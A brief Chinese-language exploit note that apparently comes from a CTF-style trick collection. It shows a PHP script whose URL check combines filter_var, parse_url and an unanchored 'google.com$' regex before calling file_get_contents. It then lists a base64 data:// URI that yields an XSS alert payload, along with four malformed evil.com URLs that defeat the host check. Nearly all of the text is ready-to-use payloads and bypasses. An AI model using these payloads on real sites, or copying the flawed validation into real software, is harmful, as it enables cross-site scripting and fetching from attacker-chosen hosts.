当 php 如此构造
<?php
echo "Argument: ".$argv[1]."n";
// check if argument is a valid URL
if(filter_var($argv[1], FILTER_VALIDATE_URL)) {
// parse URL
$r = parse_url($argv[1]);
print_r($r);
// check if host ends with google.com
if(preg_match('/google.com$/', $r['host'])) {
// get page from URL
$a = file_get_contents($argv[1]);
echo($a);
} else {
echo "Error: Host not allowed";
}
} else {
echo "Error: Invalid URL";
}
?>
产生XSS payload :
http://xxx.com/123asd.php?1=data://text/plain;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
绕过匹配:
0://evil$google.com
0://evil.com:80,google.com:80/
0://evil.com:80;google.com:80/
0://evil.com:80://google.com